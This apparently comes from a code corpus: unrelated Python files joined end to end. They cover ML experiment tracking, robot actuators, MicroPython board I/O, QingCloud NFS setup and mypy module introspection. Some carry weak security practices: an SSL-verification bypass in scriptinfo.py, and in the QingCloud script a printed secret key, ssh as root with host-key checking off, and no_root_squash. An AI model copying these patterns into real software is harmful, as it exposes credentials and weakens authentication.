try:
if self.api and self.api.wait_update():
self.api.close()
self.is_connected = False
if self.update_thread:
self.update_thread.join()
except Exception as e:
self.gateway.write_log('退出天勤行情api异常:{}'.format(str(e)))
|
scriptinfo.py
|
import os
import sys
from tempfile import mkstemp
import attr
import collections
import logging
import json
from furl import furl
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output
from ....backend_api import Session
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self):
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = get_installed_pkgs_detail()
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(module_callback=ScriptRequirements.add_trains_used_packages)
return self.create_requirements_txt(reqs, local_pks)
except Exception:
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
import boto3
modules.add('boto3', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from google.cloud import storage
modules.add('google_cloud_storage', 'trains.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
from azure.storage.blob import ContentSettings
modules.add('azure_storage_blob', 'trains.storage', 0)
except Exception:
pass
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
import torch.utils.tensorboard
import tensorboard
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower().replace('-', '_')
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = reqs_lower.get(name, (None, None))
if k:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
except:
conda_requirements = ''
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
if k == '-e':
requirements_txt += '{0} {1}\n'.format(k, v.version)
elif v:
requirements_txt += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
requirements_txt += '{0}\n'.format(k)
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
return requirements_txt, conda_requirements
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
@classmethod
def observer(cls, jupyter_notebook_filename):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from trains import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception:
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
# noinspection PyBroadException
try:
get_ipython().run_line_magic('notebook', local_jupyter_filename)
except Exception as ex:
continue
# get notebook python script
script_code, resources = _script_exporter.from_filename(local_jupyter_filename)
current_script_hash = hash(script_code)
if prev_script_hash and prev_script_hash == current_script_hash:
continue
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
fmodules, _ = file_import_modules(notebook.parts[-1], script_code)
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
installed_pkgs = get_installed_pkgs_detail()
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
task._update_script(script=data_script)
# update requirements
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep+'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except:
server_info = None
if server_info:
break
try:
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions',
headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
r.raise_for_status()
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = notebook_name
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even oon windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _get_working_dir(cls, repo_root):
repo_root = Path(repo_root).absolute()
try:
return Path.cwd().relative_to(repo_root).as_posix()
except ValueError:
# Working directory not under repository root
return os.path.curdir
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(cls, filepath, check_uncommitted=True, create_requirements=True, log=None):
jupyter_filepath = cls._get_jupyter_notebook_filename()
if jupyter_filepath:
script_path = Path(os.path.normpath(jupyter_filepath)).absolute()
else:
script_path = Path(os.path.normpath(filepath)).absolute()
if not script_path.is_file():
raise ScriptInfoError(
"Script file [{}] could not be found".format(filepath)
)
script_dir = script_path.parent
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
if not plugin:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(str(script_dir), include_diff=check_uncommitted)
except Exception as ex:
_log("no info for {} ({})", script_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", script_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
)
messages = []
if repo_info.modified:
messages.append(
"======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
script_info.get("repository", "")
)
)
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages),
script_requirements)
@classmethod
def get(cls, filepath=sys.argv[0], check_uncommitted=True, create_requirements=True, log=None):
try:
return cls._get_script_info(
filepath=filepath, check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log)
except Exception as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
|
actuator.py
|
# MIT License
#
# Copyright (c) 2021 Mobotx
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import time
import grpc
from .asset import Asset
class Actuator(Asset):
def __init__(self, logger, connection):
super().__init__(logger, connection)
self._available = False
self.__cmd = None
self.__lock = threading.Lock()
self.__new_cmd_lock = threading.Lock()
self.__new_cmd_lock.acquire()
self.__enabled = False
def _actuator_cmd_stream(self, metadata, context):
if self._is_body(context) and self.__enabled:
self.__lock.acquire()
self._set_metadata(metadata)
self._available = True
is_available_thread = threading.Thread(
target=self.__poll_is_available, args=(context,)
)
is_available_thread.start()
try:
while True:
self.__lock.acquire()
if self._available:
yield self.__cmd
if self.__new_cmd_lock.locked():
self.__new_cmd_lock.release()
else:
raise grpc.RpcError
except grpc.RpcError:
self._available = False
self.__cmd = None
self._reset_metadata()
self.__lock.release()
else:
context.cancel()
def __poll_is_available(self, context):
while context.is_active():
time.sleep(0.1)
self._available = False
self.__lock.release()
def _new_cmd(self, cmd, blocking=False):
if self.__lock.locked():
self.__cmd = cmd
if blocking:
self.__lock.release()
self.__new_cmd_lock.acquire()
else:
self.__lock.release()
def enable(self):
self.__enabled = True
def _is_enabled(self):
return self.__enabled
def _wait_until_available(self):
while not self._available:
time.sleep(0.1)
if not self._connection.attach_brain_iterator.is_active():
return False
return True
def _set_metadata(self, metadata):
pass
def _reset_metadata(self):
pass
|
connection.py
|
import time
import re
from threading import Lock, Thread
from src.utility.exceptions import OperationError
class Connection:
def __init__(self, terminal=None):
self._terminal = terminal
self._reader_running = False
self._auto_read_enabled = True
self._auto_reader_lock = Lock()
def is_connected(self):
raise NotImplementedError()
def disconnect(self):
raise NotImplementedError()
def read_line(self):
raise NotImplementedError()
def read_all(self):
raise NotImplementedError()
def read_junk(self):
self.read_all()
def read_one_byte(self):
raise NotImplementedError()
def read_to_next_prompt(self, timeout=5.0):
ret = b""
t_start = time.time()
while len(ret) < 4 or ret[-4:] != b">>> ":
if (time.time() - t_start) >= timeout:
raise TimeoutError()
ret += self.read_one_byte()
return ret.decode("utf-8", errors="replace")
def send_line(self, line_text, ending="\r\n"):
raise NotImplementedError()
def send_character(self, char):
raise NotImplementedError()
def send_bytes(self, binary):
raise NotImplementedError()
def send_block(self, text):
lines = text.split("\n")
if len(lines) == 1:
self.send_line(lines[0])
elif len(lines) > 1:
self.send_start_paste()
for line in lines:
self.send_line(line)
self.send_end_paste()
def run_file(self, file_name, globals_init=""):
self.send_start_paste()
if globals_init:
self.send_line(globals_init, "\r")
self.send_line("with open(\"{}\") as f:".format(file_name))
self.send_line(" exec(f.read(), globals())")
self.send_end_paste()
def remove_file(self, file_name):
success = True
# Prevent echo
self._auto_reader_lock.acquire()
self._auto_read_enabled = False
self.send_line("import os; os.remove(\"{}\")".format(file_name))
try:
self.read_to_next_prompt()
except TimeoutError:
success = False
self._auto_read_enabled = True
self._auto_reader_lock.release()
if not success:
raise OperationError()
def get_file_size(self, file_name):
success = True
file_size = 0
self._auto_reader_lock.acquire()
self._auto_read_enabled = False
self.send_line("import os; os.stat(\"{}\")".format(file_name))
try:
res = self.read_to_next_prompt()
# Skip first line which is command echo
res = res[res.find("\n"):]
# Strip parentheses and split to items
items = res.strip("()\r\n ").split(", ")
# Sixth item is file size
file_size = int(items[6])
except TimeoutError:
success = False
self._auto_read_enabled = True
self._auto_reader_lock.release()
if not success:
raise OperationError()
return file_size
def send_start_paste(self):
self.send_character("\5")
def send_end_paste(self):
self.send_character("\4")
def send_kill(self):
self.send_character("\3")
def _reader_thread_routine(self):
self._reader_running = True
while self._reader_running:
self._auto_reader_lock.acquire()
x = ""
if self._auto_read_enabled:
x = self.read_line()
self._auto_reader_lock.release()
time.sleep(0.1 if not x else 0)
@staticmethod
def _get_remote_file_name(local_file_path):
return local_file_path.rsplit("/", 1)[1]
def list_files(self):
success = True
# Pause autoreader so we can receive response
self._auto_reader_lock.acquire()
self._auto_read_enabled = False
# Stop any running script
self.send_kill()
# Read any leftovers
self.read_junk()
# Mark the start of file listing communication
self.send_line("print('#fs#')")
# Now we either wait for any running program to finish
# or read output that it might be producing until it finally
# closes and our command gets executed.
ret = ""
while "#fs#" not in ret:
try:
ret = self.read_to_next_prompt()
except TimeoutError:
success = False
# Now we can be sure that we are ready for listing files
# Send command for listing files
if success:
self.send_line("import os; os.listdir()")
# Wait for reply
try:
ret = self.read_to_next_prompt()
except TimeoutError:
success = False
self._auto_read_enabled = True
self._auto_reader_lock.release()
if success and ret:
return re.findall("'([^']+)'", ret)
else:
raise OperationError()
def _write_file_job(self, remote_name, content, transfer):
raise NotImplementedError()
def write_file(self, file_name, text, transfer):
job_thread = Thread(target=self._write_file_job,
args=(file_name, text, transfer))
job_thread.setDaemon(True)
job_thread.start()
def _write_files_job(self, local_file_paths, transfer):
for local_path in local_file_paths:
remote_name = self._get_remote_file_name(local_path)
with open(local_path, "rb") as f:
content = f.read()
self._write_file_job(remote_name, content, transfer)
if transfer.cancel_scheduled:
transfer.confirm_cancel()
if transfer.error or transfer.cancelled:
break
def write_files(self, local_file_paths, transfer):
job_thread = Thread(target=self._write_files_job,
args=(local_file_paths, transfer))
job_thread.setDaemon(True)
job_thread.start()
def _read_file_job(self, file_name, transfer):
raise NotImplementedError()
def read_file(self, file_name, transfer):
job_thread = Thread(target=self._read_file_job, args=(file_name, transfer))
job_thread.setDaemon(True)
job_thread.start()
|
create_s2_account_vdi_host.py
|
#!/usr/bin/env python
#coding:utf-8
'''
Created on 2019-03-05
@author: yunify
'''
import qingcloud.iaas
import threading
import time
from optparse import OptionParser
import sys
import os
import qingcloud.iaas.constants as const
import common.common as Common
def get_s2server_ip(conn,user_id,s2_servers_id):
print("get_s2server_ip user_id == %s s2_servers_id == %s" %(user_id,s2_servers_id))
private_ip = None
if s2_servers_id and not isinstance(s2_servers_id, list):
s2_servers_id = [s2_servers_id]
print("s2_servers_id == %s" % (s2_servers_id))
# DescribeS2Servers
action = const.ACTION_DESCRIBE_S2_SERVERS
print("action == %s" % (action))
ret = conn.describe_s2_servers(owner=user_id,s2_servers=s2_servers_id,verbose=1)
print("describe_s2_servers ret == %s" % (ret))
Common.check_ret_code(ret, action)
# get private_ip
s2_server_set = ret['s2_server_set']
if s2_server_set is None or len(s2_server_set) == 0:
print("describe_s2_servers s2_server_set is None")
exit(-1)
for s2_server in s2_server_set:
private_ip = s2_server.get("private_ip")
return private_ip
def update_s2_servers(conn,user_id,s2_servers_id):
print("update_s2_servers user_id == %s s2_servers_id == %s" %(user_id,s2_servers_id))
if s2_servers_id and not isinstance(s2_servers_id, list):
s2_servers_id = [s2_servers_id]
print("s2_servers_id == %s" % (s2_servers_id))
# UpdateS2Servers
action = const.ACTION_UPDATE_S2_SERVERS
print("action == %s" % (action))
ret = conn.update_s2_servers(owner=user_id,s2_servers=s2_servers_id)
print("update_s2_servers ret == %s" % (ret))
Common.check_ret_code(ret, action)
job_id = ret['job_id']
print("job_id == %s" % (job_id))
# check job status
num = 0
while num < 300:
num = num + 1
print("num == %d" % (num))
time.sleep(1)
status = Common.get_job_status(conn, job_id)
if status == "successful":
print("update_s2_servers successful")
break
print("status == %s" % (status))
# # Result is written to file
# if status == "successful":
# print("update_s2_servers s2_servers successful")
# #s2server_ip 写入文件
# s2server_ip_conf = "/opt/s2server_ip_conf"
# s2server_ip = get_s2server_ip(conn,user_id,s2_servers_id)
# print("get_s2server_ip s2server_ip == %s" %(s2server_ip))
# if s2server_ip:
# with open(s2server_ip_conf, "w+") as f1:
# f1.write("S2SERVER_ADDRESS %s" %(s2server_ip))
print("子线程结束")
return None
def create_s2_account_vdi_host(conn,user_id,g_vdi_ip_list):
print("create_s2_account_vdi_host user_id == %s g_vdi_ip_list == %s" %(user_id,g_vdi_ip_list))
if g_vdi_ip_list and not isinstance(g_vdi_ip_list, list):
g_vdi_ip_list = [g_vdi_ip_list]
print("g_vdi_ip_list == %s" % (g_vdi_ip_list))
s2_account_id_list = []
for vdi_ip in g_vdi_ip_list:
print("vdi_ip == %s" %(vdi_ip))
# DescribeS2Groups
action = const.ACTION_DESCRIBE_S2_GROUPS
print("action == %s" % (action))
ret = conn.describe_s2_groups(owner=user_id,offset=0,limit=1,verbose=1,group_types=['NFS_GROUP'])
Common.check_ret_code(ret, action)
# get s2_group_id
s2_group_set = ret['s2_group_set']
if s2_group_set is None or len(s2_group_set) == 0:
print("describe_s2_groups s2_group_set is None")
exit(-1)
for s2_group in s2_group_set:
s2_group_id = s2_group.get("group_id")
print("s2_group_id == %s" % (s2_group_id))
# CreateS2Account
action = const.ACTION_CREATE_S2_ACCOUNT
print("action == %s" % (action))
s2_groups_list = [{"group_id":s2_group_id,"rw_flag":"rw"}]
print("s2_groups_list == %s" % (s2_groups_list))
ret = conn.create_s2_account(owner=user_id,account_name='vdi-portal-account',account_type='NFS',nfs_ipaddr=vdi_ip,s2_group=s2_group_id,opt_parameters='squash=no_root_squash,sync=sync',s2_groups=s2_groups_list)
ret_code = ret.get("ret_code")
if ret_code != 0:
print("%s failed" % (action))
continue
# get s2_account_id
s2_account_id = ret.get("s2_account_id")
if s2_account_id not in s2_account_id_list:
s2_account_id_list.append(s2_account_id)
print("s2_account_id_list == %s" % (s2_account_id_list))
return None
if __name__ == "__main__":
print("主线程启动")
#解析参数
opt_parser = OptionParser()
opt_parser.add_option("-z", "--zone_id", action="store", type="string", \
dest="zone_id", help='zone id', default="")
opt_parser.add_option("-a", "--access_key_id", action="store", type="string", \
dest="access_key_id", help='access key id', default="")
opt_parser.add_option("-s", "--secret_access_key", action="store", type="string", \
dest="secret_access_key", help='secret access key', default="")
opt_parser.add_option("-H", "--host", action="store", type="string", \
dest="host", help='host', default="")
opt_parser.add_option("-p", "--port", action="store", type="string", \
dest="port", help='port', default="")
opt_parser.add_option("-P", "--protocol", action="store", type="string", \
dest="protocol", help='protocol', default="")
opt_parser.add_option("-i", "--s2_server_id", action="store", type="string", \
dest="s2_server_id", help='s2_server_id', default="")
opt_parser.add_option("-d", "--vdi_ips", action="store", type="string", \
dest="vdi_ips", help='vdi ips', default="")
(options, _) = opt_parser.parse_args(sys.argv)
zone_id = options.zone_id
access_key_id = options.access_key_id
secret_access_key = options.secret_access_key
host = options.host
port = options.port
protocol = options.protocol
s2_server_id = options.s2_server_id
vdi_ips = Common.explode_array(options.vdi_ips or "")
print("zone_id:%s" % (zone_id))
print("access_key_id:%s" % (access_key_id))
print("secret_access_key:%s" % (secret_access_key))
print("host:%s" % (host))
print("port:%s" % (port))
print("protocol:%s" % (protocol))
print("s2_server_id:%s" % (s2_server_id))
print("vdi_ips:%s" % (vdi_ips))
#连接iaas后台
conn = Common.connect_iaas(zone_id, access_key_id, secret_access_key, host,port,protocol)
print("connect_iaas conn == %s" % (conn))
# 获取账号ID
user_id = Common.get_user_id(conn,access_key_id)
print("get_user_id user_id == %s" % (user_id))
#创建子线程--创建vnas服务访问资源账号 vdi客户端
t3 = threading.Thread(target=create_s2_account_vdi_host,args=(conn,user_id,vdi_ips,))
t3.start()
t3.join()
#在执行共享存储目标的所有修改、禁用、删除等操作之前请在客户端停止对共享存储目标的访问,并执行 umount 操作,否则可能会引起客户端无法响应。
for vdi_ip in vdi_ips:
print("vdi_ip == %s" %(vdi_ip))
os.system('ssh -o StrictHostKeyChecking=no root@%s "umount /mnt/nasdata"' % (vdi_ip))
#创建子线程--更新共享存储服务器的配置信息
t4 = threading.Thread(target=update_s2_servers,args=(conn,user_id,s2_server_id,))
t4.start()
t4.join()
print("主线程结束")
|
moduleinspect.py
|
"""Basic introspection of modules."""
from typing import List, Optional, Union
from types import ModuleType
from multiprocessing import Process, Queue
import importlib
import inspect
import os
import pkgutil
import queue
import sys
class ModuleProperties:
def __init__(
self,
name: str,
file: Optional[str],
path: Optional[List[str]],
all: Optional[List[str]],
is_c_module: bool,
subpackages: List[str],
) -> None:
self.name = name # __name__ attribute
self.file = file # __file__ attribute
self.path = path # __path__ attribute
self.all = all # __all__ attribute
self.is_c_module = is_c_module
self.subpackages = subpackages
def is_c_module(module: ModuleType) -> bool:
if module.__dict__.get("__file__") is None:
# Could be a namespace package. These must be handled through
# introspection, since there is no source file.
return True
return os.path.splitext(module.__dict__["__file__"])[-1] in [".so", ".pyd"]
class InspectError(Exception):
pass
def get_package_properties(package_id: str) -> ModuleProperties:
"""Use runtime introspection to get information about a module/package."""
try:
package = importlib.import_module(package_id)
except BaseException as e:
raise InspectError(str(e))
name = getattr(package, "__name__", None)
file = getattr(package, "__file__", None)
path = getattr(package, "__path__", None) # type: Optional[List[str]]
if not isinstance(path, list):
path = None
pkg_all = getattr(package, "__all__", None)
if pkg_all is not None:
try:
pkg_all = list(pkg_all)
except Exception:
pkg_all = None
is_c = is_c_module(package)
if path is None:
# Object has no path; this means it's either a module inside a package
# (and thus no sub-packages), or it could be a C extension package.
if is_c:
# This is a C extension module, now get the list of all sub-packages
# using the inspect module
subpackages = [
package.__name__ + "." + name
for name, val in inspect.getmembers(package)
if inspect.ismodule(val)
and val.__name__ == package.__name__ + "." + name
]
else:
# It's a module inside a package. There's nothing else to walk/yield.
subpackages = []
else:
all_packages = pkgutil.walk_packages(
path, prefix=package.__name__ + ".", onerror=lambda r: None
)
subpackages = [
qualified_name for importer, qualified_name, ispkg in all_packages
]
return ModuleProperties(
name=name,
file=file,
path=path,
all=pkg_all,
is_c_module=is_c,
subpackages=subpackages,
)
def worker(
tasks: "Queue[str]",
results: "Queue[Union[str, ModuleProperties]]",
sys_path: List[str],
) -> None:
"""The main loop of a worker introspection process."""
sys.path = sys_path
while True:
mod = tasks.get()
try:
prop = get_package_properties(mod)
except InspectError as e:
results.put(str(e))
continue
results.put(prop)
class ModuleInspect:
"""Perform runtime introspection of modules in a separate process.
Reuse the process for multiple modules for efficiency. However, if there is an
error, retry using a fresh process to avoid cross-contamination of state between
modules.
We use a separate process to isolate us from many side effects. For example, the
import of a module may kill the current process, and we want to recover from that.
Always use in a with statement for proper clean-up:
with ModuleInspect() as m:
p = m.get_package_properties('urllib.parse')
"""
def __init__(self) -> None:
self._start()
def _start(self) -> None:
self.tasks = Queue() # type: Queue[str]
self.results = Queue() # type: Queue[Union[ModuleProperties, str]]
self.proc = Process(target=worker, args=(self.tasks, self.results, sys.path))
self.proc.start()
self.counter = 0 # Number of successful roundtrips
def close(self) -> None:
"""Free any resources used."""
self.proc.terminate()
def get_package_properties(self, package_id: str) -> ModuleProperties:
"""Return some properties of a module/package using runtime introspection.
Raise InspectError if the target couldn't be imported.
"""
self.tasks.put(package_id)
res = self._get_from_queue()
if res is None:
# The process died; recover and report error.
self._start()
raise InspectError("Process died when importing %r" % package_id)
if isinstance(res, str):
# Error importing module
if self.counter > 0:
# Also try with a fresh process. Maybe one of the previous imports has
# corrupted some global state.
self.close()
self._start()
return self.get_package_properties(package_id)
raise InspectError(res)
self.counter += 1
return res
def _get_from_queue(self) -> Union[ModuleProperties, str, None]:
"""Get value from the queue.
Return the value read from the queue, or None if the process unexpectedly died.
"""
max_iter = 100
n = 0
while True:
if n == max_iter:
raise RuntimeError("Timeout waiting for subprocess")
try:
return self.results.get(timeout=0.05)
except queue.Empty:
if not self.proc.is_alive():
return None
n += 1
def __enter__(self) -> "ModuleInspect":
return self
def __exit__(self, *args: object) -> None:
self.close()
|
Binance_Detect_Moonings.py
|
"""
Horacio Oscar Fanelli - Pantersxx3
Version: 6.2
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repositoy should be
construed as investment advice.Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
